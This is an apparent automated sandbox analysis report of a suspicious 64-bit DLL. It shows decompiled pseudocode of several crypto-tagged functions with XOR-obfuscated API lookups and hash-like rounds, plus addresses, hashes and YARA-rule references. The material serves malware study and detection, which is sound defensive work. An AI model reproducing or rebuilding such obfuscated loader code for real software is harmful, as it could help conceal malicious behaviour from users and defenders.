				 *((long long*)(_t319 + 0x248)) = _t319 + 0x160;
				goto 0x130f9f68;
				r8d = 0x2598;
				 *((long long*)(_t337 + 0xd8)) = __r13;
				_t359 =  *((intOrPtr*)(_t337 + 0x110));
				r12d =  *(_t359 + 0x188);
				r15d =  *(_t359 + 0x140);
				 *(_t359 + 0x120) =  *(_t359 + 0x120) - ( *(_t359 + 0x1f0) &  *(_t359 + 0x20));
				r15d = r15d & r10d;
				r15d = r15d *  *(_t359 + 0x1a0);
				r14d =  *(_t359 + 0x20);
				r11d = r10d;
				r11d = r11d | r8d;
				 *(_t337 + 0x100) =  *(_t337 + 0x100) -  *((intOrPtr*)(_t359 + 0x48));
				r11d = r11d & r12d;
				r8d =  *(_t337 + 0xf8);
				r8d = r8d -  *((intOrPtr*)(_t359 + 0x1e0));
				r12d = r12d |  *(_t337 + 0xe0);
				r9d =  *(_t337 + 0x100);
				r14d = r14d | 0x000038e9;
				 *(_t337 + 0x70) = r15d;
				 *(_t337 + 0x68) = r14d;
				 *(_t337 + 0x60) =  *(_t359 + 0x1b8) - r11d + r11d;
				 *(_t359 + 0xe8) =  *(_t359 + 0xe8) * _t319;
				_t197 =  *(_t337 + 0xd0);
				r10d = _t197;
				r12d = r12d + _t197;
				r10d = r10d | 0x000037e1;
				 *(_t337 + 0x58) = ( *(_t359 + 0x200) & __rax - 0x000003bc - r8d) * _t197;
				 *(_t337 + 0x50) = r12d - r10d;
				 *(_t337 + 0x48) =  *(_t359 + 0xc8) * _t197;
				 *(_t337 + 0x40) = r11d;
				 *(_t337 + 0x38) = r10d;
				 *(_t337 + 0x30) = r8d;
				_t344 = _t359;
				 *(_t337 + 0x28) = r12d;
				 *((intOrPtr*)(_t337 + 0x20)) =  *((intOrPtr*)(_t359 + 0x130)) -  *((intOrPtr*)(_t359 + 0x80));
				E00007FFC7FFC130E9BA0( *(_t359 + 0xe8) * _t319, _t319,  *(_t304 + 0x1b8) * 0x228c, _t344,  &((_t352 + _t336 + r8d * 2)[1]), _t356);
				r8d = 0x343a;
				r9d =  *(_t337 + 0xf8);
				_t321 =  *(_t359 + 0x1f8) * 0x00001f2c & _t344;
				r9d = r9d *  *(_t359 + 0x120);
				r12d =  *(_t359 + 0x1c0);
				_t250 =  *(_t337 + 0x118) + 0xfffffe29 +  *(_t359 + 0xd8) * 0x30d5;
				r15d = _t250;
				r14d =  *(_t359 + 0x1c8);
				r15d = r15d & 0x000030d5;
				_t315 =  *(_t359 + 0x1b8) * _t321;
				r9d = r9d ^ 0x00003666;
				 *(_t359 + 0x1b8) = _t315;
				r8d =  *(_t337 + 0xe8);
				r11d = _t321 + _t315;
				r10d = _t250;
				r10d = r10d ^ 0x000027b2;
				r10d = r10d *  *(_t359 + 0x1b0);
				r12d = r12d &  *(_t337 + 0x84);
				 *(_t337 + 0x60) = r15d;
				 *(_t337 + 0x58) = r9d;
				 *(_t337 + 0x50) = r12d * r8d;
				 *(_t337 + 0x48) =  *(_t359 + 0x188) - r8d +  *_t359;
				 *(_t337 + 0x40) =  *((intOrPtr*)(_t359 + 0x100)) -  *((intOrPtr*)(_t359 + 0x1d0)) + 0x329d;
				 *(_t337 + 0x38) = r11d;
				r8d = ( *((intOrPtr*)(_t337 + 0x80)) -  *((intOrPtr*)(_t359 + 0x70))) * 0x3666;
				 *(_t337 + 0x30) =  *((intOrPtr*)(_t337 + 0xf0)) + 0xffffda68 | r14d;
				 *(_t337 + 0x28) = r10d;
				 *((intOrPtr*)(_t337 + 0x20)) = r8d * 0x2103 -  *((intOrPtr*)(_t359 + 0xe0));
				E00007FFC7FFC130F7C20(_t323 - 0x3595 - _t323 - 1, _t321,  *(_t304 + 0x1b8) * 0x228c, _t334, _t344, _t359);
				return  *(_t337 + 0x88) + 0x927;
			}































                                0x7ffc130f9909
                                0x7ffc130f991d
                                0x7ffc130f9925
                                0x7ffc130f992c
                                0x7ffc130f9939
                                0x7ffc130f9941
                                0x7ffc130f9948
                                0x7ffc130f9955
                                0x7ffc130f9964
                                0x7ffc130f9971
                                0x7ffc130f9979
                                0x7ffc130f998b
                                0x7ffc130f9999
                                0x7ffc130f99a6
                                0x7ffc130f99b0
                                0x7ffc130f99b6
                                0x7ffc130f99c6
                                0x7ffc130f99cc
                                0x7ffc130f99d3
                                0x7ffc130f99d6
                                0x7ffc130f99da
                                0x7ffc130f99e0
                                0x7ffc130f99f8
                                0x7ffc130f9a07
                                0x7ffc130f9a17
                                0x7ffc130f9a27
                                0x7ffc130f9a30
                                0x7ffc130f9a47
                                0x7ffc130f9a50
                                0x7ffc130f9a67
                                0x7ffc130f9a70
                                0x7ffc130f9a89
                                0x7ffc130f9aaa
                                0x7ffc130f9abf
                                0x7ffc130f9acb
                                0x7ffc130f9ad2
                                0x7ffc130f9add
                                0x7ffc130f9afa
                                0x7ffc130f9b1b
                                0x7ffc130f9b29
                                0x7ffc130f9b34
                                0x7ffc130f9b3f
                                0x7ffc130f9b43
                                0x7ffc130f9b4d
                                0x7ffc130f9b60
                                0x7ffc130f9b67
                                0x7ffc130f9b6e
                                0x7ffc130f9b78
                                0x7ffc130f9b83
                                0x7ffc130f9b8e
                                0x7ffc130f9b90
                                0x7ffc130f9b9b
                                0x7ffc130f9bae
                                0x7ffc130f9bbc
                                0x7ffc130f9bc0
                                0x7ffc130f9bc7
                                0x7ffc130f9bcd
                                0x7ffc130f9bd5
                                0x7ffc130f9bdc
                                0x7ffc130f9be3
                                0x7ffc130f9be7
                                0x7ffc130f9bed
                                0x7ffc130f9bf4
                                0x7ffc130f9bfb
                                0x7ffc130f9c00
                                0x7ffc130f9c05
                                0x7ffc130f9c07
                                0x7ffc130f9c0a
                                0x7ffc130f9c13
                                0x7ffc130f9c23
                                0x7ffc130f9c31
                                0x7ffc130f9c42
                                0x7ffc130f9c49
                                0x7ffc130f9c57
                                0x7ffc130f9c62
                                0x7ffc130f9c6b
                                0x7ffc130f9c72
                                0x7ffc130f9c7d
                                0x7ffc130f9c83
                                0x7ffc130f9c95
                                0x7ffc130f9ca2
                                0x7ffc130f9cab
                                0x7ffc130f9cc0
                                0x7ffc130f9ccf
                                0x7ffc130f9cdd
                                0x7ffc130f9ceb
                                0x7ffc130f9cf0
                                0x7ffc130f9cf6
                                0x7ffc130f9cfe
                                0x7ffc130f9d06
                                0x7ffc130f9d2e
                                0x7ffc130f9d31
                                0x7ffc130f9d38
                                0x7ffc130f9d49
                                0x7ffc130f9d5a
                                0x7ffc130f9d68
                                0x7ffc130f9d73
                                0x7ffc130f9d76
                                0x7ffc130f9d7d
                                0x7ffc130f9d80
                                0x7ffc130f9d8a
                                0x7ffc130f9da1
                                0x7ffc130f9dac
                                0x7ffc130f9db4
                                0x7ffc130f9dbb
                                0x7ffc130f9dc0
                                0x7ffc130f9dc5
                                0x7ffc130f9dc9
                                0x7ffc130f9dd0
                                0x7ffc130f9dd7
                                0x7ffc130f9ddd
                                0x7ffc130f9de3
                                0x7ffc130f9df8
                                0x7ffc130f9dfc
                                0x7ffc130f9e00
                                0x7ffc130f9e04
                                0x7ffc130f9e09
                                0x7ffc130f9e0e
                                0x7ffc130f9e13
                                0x7ffc130f9e16
                                0x7ffc130f9e1b
                                0x7ffc130f9e1f
                                0x7ffc130f9e2f
                                0x7ffc130f9e47
                                0x7ffc130f9e4f
                                0x7ffc130f9e52
                                0x7ffc130f9e60
                                0x7ffc130f9e67
                                0x7ffc130f9e70
                                0x7ffc130f9e73
                                0x7ffc130f9e7a
                                0x7ffc130f9e81
                                0x7ffc130f9e8c
                                0x7ffc130f9e93
                                0x7ffc130f9ea4
                                0x7ffc130f9eac
                                0x7ffc130f9ec0
                                0x7ffc130f9ed1
                                0x7ffc130f9ed8
                                0x7ffc130f9eed
                                0x7ffc130f9efb
                                0x7ffc130f9f03
                                0x7ffc130f9f27
                                0x7ffc130f9f2b
                                0x7ffc130f9f2f
                                0x7ffc130f9f33
                                0x7ffc130f9f38
                                0x7ffc130f9f42
                                0x7ffc130f9f46
                                0x7ffc130f9f4b
                                0x7ffc130f9f4f
                                0x7ffc130f9f79

                                Strings
                                • y but matter August platforms wavy periodic alternate will stale capital wave technique computer dared hobby garments chose crawled microphone politics arcadia roman demolition hanky softly ticket fur jug plunged tower goodness prop telegram zoological doorway, xrefs: 00007FFC130F9A60
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID:
                                • String ID: y but matter August platforms wavy periodic alternate will stale capital wave technique computer dared hobby garments chose crawled microphone politics arcadia roman demolition hanky softly ticket fur jug plunged tower goodness prop telegram zoological doorway
                                • API String ID: 0-156379247
                                • Opcode ID: 85bbfddf9d8429de60b2b2be73729eb057ebefaedf4f10f86c3e2610b7d79d4e
                                • Instruction ID: a6203b5a00b6539abd7bfc368981bddb2d5c9738ef1796bb800b0a5a35065d33
                                • Opcode Fuzzy Hash: 85bbfddf9d8429de60b2b2be73729eb057ebefaedf4f10f86c3e2610b7d79d4e
                                • Instruction Fuzzy Hash: 3FF1CB73605AD88BD361CF19D488BDE77A8F788B88F148136DB4917B64DB39D952CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000201640C9D6C Relevance: 1.5, APIs: 1, Instructions: 210memoryCOMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 67%
                                			E00000201201640C9D6C(void* __ebx, void* __edx, long long __rbx, long long __rcx, void* __rdx, void* __r8, void* __r9, void* __r10, void* __r11, void* _a8, signed int _a16, char _a24, char _a32) {
				void* _v48;
				intOrPtr _v56;
				intOrPtr _v64;
				signed long long _v72;
				char _v80;
				char _v88;
				long long _v96;
				signed long long _v104;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				signed int _t81;
				long long _t155;
				signed long long _t156;
				long long _t159;
				long long* _t163;
				long long _t196;
				long long _t198;
				long long _t200;
				void* _t203;
				long long _t205;
				signed int* _t212;
				void* _t230;
				void* _t232;
				void* _t234;

				_t231 = __r11;
				_t230 = __r10;
				_t155 = _t205;
				 *((long long*)(_t155 + 8)) = __rbx;
				r12d =  *0x640cd450;
				 *(_t155 + 0x20) =  *(_t155 + 0x20) & 0x00000000;
				_t159 = __rcx;
				_t163 = _t155 - 0x40;
				if (E00000201201640C88C8(__rcx, _t163, _t196, _t198, _t203, _t234, _t232) != 0) goto 0x640ca08e;
				r9d = ( *(_t159 + 0x40))[1] & 0x0000ffff;
				if (_t163 - __r9 + 8 <= 0) goto 0x640c9ddc;
				if ((r12d ^ 0xe49a1e6d) == 0) goto 0x640c9dde;
				E00000201201640C4D70(r12d ^ 0xe49a1e6d, __r9 +  &(( *(_t159 + 0x40))[4]));
				_t200 = _t155;
				goto 0x640c9dde;
				if (_t200 == 0) goto 0x640ca084;
				_t13 = _t159 + 0xc0; // 0xc0
				_v96 = _t200;
				_v104 = _v104 & 0x00000000;
				if (E00000201201640C84E8(_t200, _t155, _t159, _t13, _v64, _t200, _t203,  *((intOrPtr*)(_t159 + 0x30)),  *((intOrPtr*)(_t159 + 0x38)), _t196, _t198) != 0) goto 0x640ca084;
				_t156 =  *((intOrPtr*)(_t159 + 0x28));
				_v72 = _t156;
				if (E00000201201640C91C8( *( *(_t159 + 0x40)) & 0x0000ffff, r12d ^ 0x61f25585, _t156, _t159, _t200, _v64, _t196, _t200,  &_v80,  &_a24, __r11) != 0) goto 0x640c9e60;
				_t212 =  &_a16;
				if (E00000201201640C672C(_v80, _v64, _t212) == 0) goto 0x640c9e60;
				goto 0x640c9e69;
				_a16 = 0;
				E00000201201640C908C(0xab05e147, _t156,  *((intOrPtr*)( *0x640cd458 + 0x18)));
				if (_t156 == 0) goto 0x640c9e97;
				r8d = 0;
				_t27 = _t212 + 1; // 0x1
				r9d = 0;
				 *_t156();
				goto 0x640c9e9c;
				if (0x7f != 0x102) goto 0x640ca084;
				 *(_t159 + 0x64) = 0x3e8;
				if (E00000201201640C91C8(_t27, r12d ^ 0x64d094d6, _t156, _t159, _t200,  &_v72, _t196, _t200,  &_v80,  &_a24, __r11) != 0) goto 0x640c9eee;
				_v104 = _v104 & 0x00000000;
				r9d = 0;
				E00000201201640C14B8(_t156, _t159, _t159, 0x201640c34a4, _t200, _v80,  &_a24);
				if (E00000201201640C91C8(_t27, r12d ^ 0xdd4632ba, _t156, _t159, _t200, 0x201640c34a4, _t196, _t200,  &_v80,  &_a24, _t231) != 0) goto 0x640c9f3c;
				if (E00000201201640C672C(_v80, 0x201640c34a4,  &_a16) == 0) goto 0x640c9f3c;
				_t81 = _a16;
				if (_t81 == 0) goto 0x640c9f3c;
				 *(_t159 + 0x64) = _t81 * 0x3e8;
				if (E00000201201640C91C8(_t27, r12d ^ 0x705ce798, _t156, _t159, _t200, 0x201640c34a4, _t196, _t200,  &_v80,  &_a24, _t231) != 0) goto 0x640c9f7f;
				if (E00000201201640C672C(_v80, 0x201640c34a4,  &_a16) == 0) goto 0x640c9f7f;
				goto 0x640c9f88;
				_a16 = 0;
				r12d = r12d ^ 0xe5c7ba87;
				if (E00000201201640C91C8(_t27, r12d, _t156, _t159, _t200, 0x201640c34a4, _t196, _t200,  &_v80,  &_a24, _t231) != 0) goto 0x640c9ffa;
				if (E00000201201640C672C(_v80, 0x201640c34a4,  &_a32) == 0) goto 0x640c9ffa;
				E00000201201640C908C(0x9c66d81c, _t156,  *((intOrPtr*)( *0x640cd458 + 0x18)));
				if (_t156 == 0) goto 0x640c9fdd;
				 *_t156();
				 *((intOrPtr*)(_t159 + 0x60)) = _a32;
				 *((long long*)(_t159 + 0x58)) = _t156 * 0x23c34600 + _v56;
				if (E00000201201640C2DC4(_t159,  &_v48,  &_v88) != 0) goto 0x640ca022;
				r8d = _v88;
				E00000201201640C7258(0, _t159, _t159, _v48, _t230);
				E00000201201640C908C(0xab05e147, _t156,  *((intOrPtr*)( *0x640cd458 + 0x18)));
				if (_t156 == 0) goto 0x640ca051;
				r8d = 0;
				r9d = 0;
				r9d = r9d * 0x3e8;
				 *_t156();
				goto 0x640ca056;
				if (0x7f != 0) goto 0x640c9ffa;
				if ( *((intOrPtr*)(_t159 + 0x50)) == 0) goto 0x640ca084;
				E00000201201640C2874( *((intOrPtr*)( *0x640cd458 + 8)),  *((intOrPtr*)(_t159 + 0x50)), _t196,  *((intOrPtr*)(_t159 + 0x50)));
				HeapFree(_t203, ??);
				0x640ca568();
				asm("lock inc ecx");
				return 0x7f;
			}




























                                0x201640c9d6c
                                0x201640c9d6c
                                0x201640c9d6c
                                0x201640c9d6f
                                0x201640c9d85
                                0x201640c9d8c
                                0x201640c9d90
                                0x201640c9d93
                                0x201640c9da0
                                0x201640c9dad
                                0x201640c9dc2
                                0x201640c9dcb
                                0x201640c9dd2
                                0x201640c9dd7
                                0x201640c9dda
                                0x201640c9de1
                                0x201640c9df4
                                0x201640c9dfb
                                0x201640c9e00
                                0x201640c9e0e
                                0x201640c9e14
                                0x201640c9e31
                                0x201640c9e3d
                                0x201640c9e44
                                0x201640c9e55
                                0x201640c9e5e
                                0x201640c9e62
                                0x201640c9e72
                                0x201640c9e7a
                                0x201640c9e7c
                                0x201640c9e8a
                                0x201640c9e8e
                                0x201640c9e91
                                0x201640c9e95
                                0x201640c9ea2
                                0x201640c9ec1
                                0x201640c9ecf
                                0x201640c9ed6
                                0x201640c9ee3
                                0x201640c9ee9
                                0x201640c9f0e
                                0x201640c9f26
                                0x201640c9f28
                                0x201640c9f31
                                0x201640c9f39
                                0x201640c9f5c
                                0x201640c9f74
                                0x201640c9f7d
                                0x201640c9f81
                                0x201640c9f88
                                0x201640c9fa9
                                0x201640c9fc1
                                0x201640c9fcc
                                0x201640c9fd4
                                0x201640c9fdb
                                0x201640c9fe7
                                0x201640c9ff6
                                0x201640ca00e
                                0x201640ca010
                                0x201640ca01d
                                0x201640ca02b
                                0x201640ca033
                                0x201640ca035
                                0x201640ca038
                                0x201640ca044
                                0x201640ca04b
                                0x201640ca04f
                                0x201640ca058
                                0x201640ca061
                                0x201640ca071
                                0x201640ca07e
                                0x201640ca089
                                0x201640ca08e
                                0x201640ca0a9

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: Heap$Alloc$Free
                                • String ID:
                                • API String ID: 1549400367-0
                                • Opcode ID: 8cda5ef62eee2583e1016891d8b3408c524cec5b4a551b585b2903ac7aa30cdf
                                • Instruction ID: 01868c3aa350cdd92afb6a686f79421782ab7f5b078dfbfd09f60731c8bb310f
                                • Opcode Fuzzy Hash: 8cda5ef62eee2583e1016891d8b3408c524cec5b4a551b585b2903ac7aa30cdf
                                • Instruction Fuzzy Hash: 1891B3222047A5C3EB60DB61E84A3DA67A9E7C4B88F544012FF4D47B9EDF39C456C748
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130EDCAC Relevance: 1.4, Strings: 1, Instructions: 139COMMONLIBRARYCODECrypto
                                Download Yara Rule
                                C-Code - Quality: 53%
                                			E00007FFC7FFC130EDCAC(void* __eax, signed int __edx, long long __rbx, signed long long*** __rcx, long long __rdi, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _t28;
				signed int _t56;
				void* _t58;
				void* _t69;
				signed long long _t70;
				void* _t75;
				signed int* _t81;
				signed long long _t83;
				signed long long _t85;
				signed long long _t86;
				signed long long _t102;
				signed long long _t103;
				signed long long _t105;
				signed long long _t111;
				signed long long _t113;
				void* _t122;
				signed long long _t125;
				signed long long _t126;
				signed long long _t127;
				signed long long* _t132;
				void* _t133;
				signed long long _t137;
				signed long long*** _t140;

				_t113 = __rsi;
				_t56 = __edx;
				_t69 = _t122;
				 *((long long*)(_t69 + 8)) = __rbx;
				 *((long long*)(_t69 + 0x10)) = __rbp;
				 *((long long*)(_t69 + 0x18)) = __rsi;
				 *((long long*)(_t69 + 0x20)) = __rdi;
				_push(_t133);
				_t70 =  *((intOrPtr*)(__rcx));
				_t140 = __rcx;
				_t81 =  *_t70;
				if (_t81 != 0) goto 0x130edce1;
				goto 0x130ede67;
				_t125 =  *0x13123760; // 0x8abfd9f97faf
				r12d = 0x40;
				_t118 =  *_t81 ^ _t125;
				asm("dec eax");
				_t83 = _t81[4] ^ _t125;
				asm("dec ecx");
				asm("dec eax");
				if ((_t81[2] ^ _t125) != _t83) goto 0x130edde1;
				_t85 = _t83 - ( *_t81 ^ _t125) >> 3;
				_t108 =  >  ? _t70 : _t85;
				_t109 = ( >  ? _t70 : _t85) + _t85;
				_t110 =  ==  ? _t70 : ( >  ? _t70 : _t85) + _t85;
				if (( ==  ? _t70 : ( >  ? _t70 : _t85) + _t85) - _t85 < 0) goto 0x130edd60;
				r8d = _t133 - 0x38;
				E00007FFC7FFC130F0B44(_t133 - 0x20, r8d & 0x0000003f, _t58, _t85, _t118,  ==  ? _t70 : ( >  ? _t70 : _t85) + _t85, __rsi, _t118, _t125);
				_t28 = E00007FFC7FFC130EE114(_t70, _t118);
				if (_t70 != 0) goto 0x130edd88;
				_t111 = _t85 + 4;
				r8d = 8;
				E00007FFC7FFC130F0B44(_t28, 0, _t58, _t85, _t118, _t111, _t113, _t118, _t125);
				_t137 = _t70;
				E00007FFC7FFC130EE114(_t70, _t118);
				if (_t137 == 0) goto 0x130edcd9;
				_t126 =  *0x13123760; // 0x8abfd9f97faf
				_t132 = _t137 + _t85 * 8;
				_t86 = _t137 + _t111 * 8;
				asm("dec eax");
				_t75 =  >  ? _t113 : _t86 - _t132 + 7 >> 3;
				if (_t75 == 0) goto 0x130edde1;
				 *_t132 = _t113 ^ _t126;
				if (_t113 + 1 != _t75) goto 0x130eddcb;
				_t127 =  *0x13123760; // 0x8abfd9f97faf
				asm("dec eax");
				 *_t132 =  *(_t140[1]) ^ _t127;
				_t102 =  *0x13123760; // 0x8abfd9f97faf
				asm("dec eax");
				 *( *( *_t140)) = _t137 ^ _t102;
				_t103 =  *0x13123760; // 0x8abfd9f97faf
				asm("dec ecx");
				( *( *_t140))[1] =  &(_t132[1]) ^ _t103;
				_t105 =  *0x13123760; // 0x8abfd9f97faf
				r12d = r12d - (_t56 & 0x0000003f);
				asm("dec eax");
				( *( *_t140))[2] = _t86 ^ _t105;
				return 0;
			}


























                                0x7ffc130edcac
                                0x7ffc130edcac
                                0x7ffc130edcac
                                0x7ffc130edcaf
                                0x7ffc130edcb3
                                0x7ffc130edcb7
                                0x7ffc130edcbb
                                0x7ffc130edcbf
                                0x7ffc130edcc9
                                0x7ffc130edcce
                                0x7ffc130edcd1
                                0x7ffc130edcd7
                                0x7ffc130edcdc
                                0x7ffc130edce1
                                0x7ffc130edce8
                                0x7ffc130edcff
                                0x7ffc130edd05
                                0x7ffc130edd08
                                0x7ffc130edd0b
                                0x7ffc130edd0e
                                0x7ffc130edd14
                                0x7ffc130edd22
                                0x7ffc130edd2c
                                0x7ffc130edd35
                                0x7ffc130edd38
                                0x7ffc130edd3f
                                0x7ffc130edd41
                                0x7ffc130edd4c
                                0x7ffc130edd56
                                0x7ffc130edd5e
                                0x7ffc130edd60
                                0x7ffc130edd64
                                0x7ffc130edd70
                                0x7ffc130edd77
                                0x7ffc130edd7a
                                0x7ffc130edd82
                                0x7ffc130edd88
                                0x7ffc130edd8f
                                0x7ffc130edd96
                                0x7ffc130edda5
                                0x7ffc130eddc2
                                0x7ffc130eddc9
                                0x7ffc130eddce
                                0x7ffc130eddd8
                                0x7ffc130eddda
                                0x7ffc130eddf6
                                0x7ffc130ede00
                                0x7ffc130ede03
                                0x7ffc130ede16
                                0x7ffc130ede1f
                                0x7ffc130ede25
                                0x7ffc130ede36
                                0x7ffc130ede3f
                                0x7ffc130ede43
                                0x7ffc130ede4f
                                0x7ffc130ede58
                                0x7ffc130ede63
                                0x7ffc130ede85

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID:
                                • String ID: @
                                • API String ID: 0-2766056989
                                • Opcode ID: 6a2f00e78af9205e3927e894e094624766f0c97d95118ad37cd236d1ad0ae9d3
                                • Instruction ID: 05fd437973813a399ba14184f96387c7638061e75d2e8623e05c0e5263f0fdbc
                                • Opcode Fuzzy Hash: 6a2f00e78af9205e3927e894e094624766f0c97d95118ad37cd236d1ad0ae9d3
                                • Instruction Fuzzy Hash: 4941B272718F688AEE04CF2AD9241A9B3A1F748FD8B599036DE0D97794DE3CD452C300
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000201640CA918 Relevance: .6, Instructions: 616COMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 56%
                                			E00000201201640CA918(void* __eflags, void* __rax, long long __rbx, long long __rcx, void* __rdx, void* __r9, void* __r10, void* __r11, void* _a8, long long _a16, intOrPtr _a24) {
				void* _v60;
				void* _v64;
				intOrPtr _v68;
				void* _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				intOrPtr _v92;
				void* _v96;
				intOrPtr _v100;
				void* _v104;
				void* _v108;
				void* _v112;
				intOrPtr _v116;
				intOrPtr _t385;
				signed int _t388;
				signed int _t567;
				signed int _t596;
				signed char* _t610;
				signed char* _t611;
				void* _t612;
				void* _t613;
				signed int* _t616;
				signed int* _t617;
				void* _t619;
				intOrPtr* _t620;

				_a16 = __rbx;
				_a8 = __rcx;
				r10d =  *(__rcx + 4);
				r11d =  *((intOrPtr*)(__rcx + 8));
				_a24 =  *((intOrPtr*)(__rcx));
				_t610 = __rdx + 2;
				_t616 = _t613 - 0x40;
				r9d = 0x10;
				_t611 =  &(_t610[4]);
				 *_t616 = (((_t610[1] & 0x000000ff) << 0x00000008 |  *_t610 & 0x000000ff) << 0x00000008 |  *(_t611 - 5) & 0x000000ff) << 0x00000008 |  *(_t611 - 6) & 0x000000ff;
				_t617 =  &(_t616[1]);
				_t619 = __r9 - 1;
				if (__eflags != 0) goto 0x640ca953;
				r15d = _v100;
				r12d = _v92;
				asm("rol edx, 0x7");
				r8d = __rcx + __rbx - 0x173848aa;
				asm("inc ecx");
				r8d = r8d + __rcx + _t612 - 0x28955b88 + r10d;
				r9d = __rcx + __r11 + 0x242070db;
				asm("inc ecx");
				r9d = r9d + r8d;
				r10d = __rcx + __r10 - 0x3e423112;
				asm("inc ecx");
				r10d = r10d + r9d;
				r11d = __rcx + _t611 - 0xa83f051;
				asm("inc ecx");
				r11d = r11d + r10d;
				asm("rol edx, 0xc");
				r8d = __rcx + _t619 - 0x57cfb9ed;
				asm("inc ecx");
				r8d = r8d + __rcx +  &(_t617[0x11e1f18a]) + r11d;
				r9d = __rcx + __r10 - 0x2b96aff;
				asm("inc ecx");
				r13d = _v80;
				r14d = _v68;
				r9d = r9d + r8d;
				r10d = __rcx + __r11 + 0x698098d8;
				asm("inc ecx");
				r10d = r10d + r9d;
				asm("rol edx, 0xc");
				asm("ror edi, 0xf");
				r9d = __rcx + _t619 - 0x76a32842;
				asm("inc ecx");
				r9d = r9d + __rcx + _t617 - 0xa44f + __rcx + _t611 - 0x74bb0851 + r10d;
				r11d = __rcx + __r10 + 0x6b901122;
				asm("inc ecx");
				r11d = r11d + r9d;
				asm("rol ebx, 0xc");
				_t388 = __rcx + _t611 - 0x2678e6d + r11d;
				r8d = _t388;
				r8d =  !r8d;
				r10d = __rcx + _t612 - 0x5986bc72;
				asm("inc ecx");
				r10d = r10d + _t388;
				r8d = r8d & r10d;
				r9d = __rcx + _t619 + 0x49b40821;
				asm("inc ecx");
				r9d = r9d + r10d;
				r8d = r8d | _t388 & r9d;
				r8d = r8d + _v116;
				r11d = _t617 + __r11 - 0x9e1da9e;
				asm("inc ecx");
				r11d = r11d + r9d;
				r8d =  &(_t611[__rbx - 0x3fbf4cc0]);
				asm("inc ecx");
				r8d = r8d + r11d;
				asm("rol edx, 0xe");
				r10d = __rcx + _t619 - 0x16493856;
				asm("inc ecx");
				r10d = r10d + __rcx + __r10 + 0x265e5a51 + r8d;
				r9d = __rcx + __r11 - 0x29d0efa3;
				asm("inc ecx");
				r9d = r9d + r10d;
				r11d = __rcx +  &(_t617[0x910514]);
				asm("inc ecx");
				r11d = r11d + r9d;
				r8d = __rcx + _t611 - 0x275e197f;
				asm("inc ecx");
				r8d = r8d + r11d;
				asm("ror edx, 0xc");
				r10d = __rcx + _t619 + 0x21e1cde6;
				asm("inc ecx");
				r10d = r10d + __rcx + __r10 - 0x182c0438 + r8d;
				r9d = __rcx + __r11 - 0x3cc8f82a;
				asm("inc ecx");
				r9d = r9d + r10d;
				r11d = __rcx + _t617 - 0xb2af279;
				asm("inc ecx");
				r11d = r11d + r9d;
				asm("ror ebx, 0xc");
				asm("rol edx, 0x5");
				r8d = __rcx + _t619 - 0x3105c08;
				asm("inc ecx");
				r8d = r8d + __rcx + __r10 - 0x561c16fb + __rcx +  &(_t611[0x455a14ed]) + r11d;
				r9d = __rcx + __r11 + 0x676f02d9;
				asm("inc ecx");
				r9d = r9d + r8d;
				r10d = __rcx + __rbx - 0x72d5b376;
				asm("inc ecx");
				r10d = r10d + r9d;
				asm("rol edx, 0x4");
				r8d = __rax + _t617 - 0x788e097f;
				asm("inc ecx");
				r8d = r8d + __rax + _t611 - 0x5c6be + r10d;
				r9d = __rax + _t619 + 0x6d9d6122;
				asm("inc ecx");
				r9d = r9d + r8d;
				r10d = __rax + __r10 - 0x21ac7f4;
				asm("inc ecx");
				r10d = r10d + r9d;
				r11d = __rcx + _t611 - 0x5b4115bc;
				asm("inc ecx");
				r11d = r11d + r10d;
				asm("rol edx, 0xb");
				r8d = __rax + _t619 - 0x944b4a0;
				asm("inc ecx");
				r8d = r8d + __rax +  &(_t617[0x12f7b3ea]) + r11d;
				r9d = __rax + __r10 - 0x41404390;
				asm("inc ecx");
				r9d = r9d + r8d;
				r10d = __rcx + __r11 + 0x289b7ec6;
				asm("inc ecx");
				r10d = r10d + r9d;
				r11d = __rax + _t611 - 0x155ed806;
